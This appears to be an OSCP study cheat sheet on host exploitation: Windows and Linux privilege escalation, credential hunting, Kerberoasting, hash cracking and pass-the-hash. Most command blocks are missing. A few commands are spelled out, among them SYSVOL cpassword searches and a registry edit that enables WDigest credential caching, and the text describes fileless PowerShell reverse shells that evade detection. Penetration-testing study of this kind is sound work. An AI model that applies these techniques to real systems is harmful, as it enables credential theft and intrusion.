Exploitation (공격)
All you need to know about basic host-based exploitation for OSCP
Windows Exploitiation
Basic commands
Add user
Add a user to a group
Create an local administrator account
Find out Windows System Information
Windows Patch Status
Find Plaintext Password
Find all those strings in config files
Find all passwords in all files
Download files from Attacker Box ( Kali ) to the target via powershell
Other downloading and uploading techinques
Download Github repo: https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
you need to manually edit the powershell script to run itself without -C or -command.
For example, using Invoke-PowerShellTcp.ps1 in /opt/nishang/Shells/Invoke-PowerShellTcp.ps1
Provoke this commmand maually by adding the command at the end of the powershell file.
You can copy the file to the victim and execute the command just by invoking DownloadString without Powershell –Command argument. This technique is wildly used to create so-called file-less malware where the evil script is executed directly in the memory of the victim machine without dropping any file as such on the harddisk. This technique is used to bypass signature based detection.
Or you can manually invoke the command via powershell string. For example,
Also for PS version 1 and 2
PS Version 1
PS Version 2
Finding password files in Registry
VNC
Windows autologin
Or via Powershell using Get-ItemProperty to exploit registry
SNMP Paramters
Putty
Search for password in registry
Finding credentials in Groups.xml
On an atttacker box, you can decrypt Group Policy Password via:
Groups.xml can be found under the below path
C:\ProgramData\Microsoft\Group Policy\History{$numbers}\Machine\Preferences\Groups
To find more information: http://www.fuzzysecurity.com/tutorials/16.html
Finding admin credentials from AppData
Running commands as a different user by using runas command
Enable RDP in Windows Target
Port 88 - Kerberoasting
Once you have a user shell you can start kerberoasting to get other users' credentials.
Without password
With password
Then try cracking the Kerberos ticket by
Then login with psexec.py.
You can choose a service for avoiding antivirus detection with --service-name.
Exploiting AD users
You should import the 'activedirectory' module first.
Add an AD member to a Group
Other Useful commands
Strings prints text strings embedded in binary files such as executables.
Transfering file to windows
Then run
List out all schedule tasks
And extra misc to check:
Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)
Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
Linux Exploitation
Spawing a intereactive TTY linux shell
Then Ctrl-Z
Type reset and hit return.
Exploiting Directory
Find any writable directories
Or use
Finding only Executable folders
Finding Writable and executable folders
Find commands that allows you to run as root with no password
You'll see the similar result as below. As you can see, User shelly can use /usr/bin.perl as root with no password.
e.g) If you are allowed to use perl command as root, you can get a revese shell stright
If this doesn't give you any hints
Check the kernel versions of the victim machines
Try googling the kernel version and PE exploits to try out.
Check the bash histroy
Check the process it's running
Finding Plaintext Passwords in web server
Plaintext Password in /var/www/html/*.php
In mail
Or using LinEnum.sh
Chekcing the service ti's running
GTFOBins
SUID
GUID
Authomation Tools
There are three useful automation tools that I use the most, which are
LinEnum.sh
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
pspy
pspy is a command line tool designed to snoop on processes without need for root permissions.
Other useful commands
List out all scheduled tasks
List the capability of a file
Password Cracking
Belw are the Cracking methonlogy used in CTF challanges.
Creating a password list
1) You can create your own dictionary or combing two different wordlists by
2) Create a customised wordlist from html page
Or use Cewl
-w is the minimum password length.
Cracking Tools
To identify which hash type it is encrypte with, use either of below commands build in Kali
Online Tools to find Hash Type
Cracking Hash
Two Kali built-in tools can be used, hashcat and john.
Hashcat
-m= hash mode, 13100 denotes Kerberos 5 TGS-REP etype 23
-a=mode, 0 denotes straight
-o= output
John the ripper
Keepass password
Putty key ppk to SSH key
Linux shadow password
First you need to combine the passwd file with the shadow file using the unshadow-program.
Decoding Base64
Cracking Unzip file password
Convert Hex to Binary
Online Tools
Cracking password for Services
Port 22- SSH
Cracking Priave RSA Key
Port 161 - SNMP
Port 3389 - RDP
Port 80/443 htaccess
Password protect directory with htaccess
Step 1
Create a directory that you want to password-protect. Create .htaccess tile inside that directory. Content of .htaccess:
Create .htpasswd file
This will now create a file called .htpasswd with the user: test and the password: admin
If the directory does not display a login-prompt, you might have to change the apache2.conf file. To this:
Then bruteforce with
Tomcat Apache
HTTP POST Login Form
Pass The Hash
You can authenticate services by using a valid username and the hash value without a decrypted password.
SMB PTH
e.g)
RDP PTH
By using evil-winrm https://github.com/Hackplayers/evil-winrm
By using freerdp-x11
Misc: Windows Password check in SAM
You can check two fundamental files from Windows, system registry and SAM registry.
Then extract the hashed password
Last updated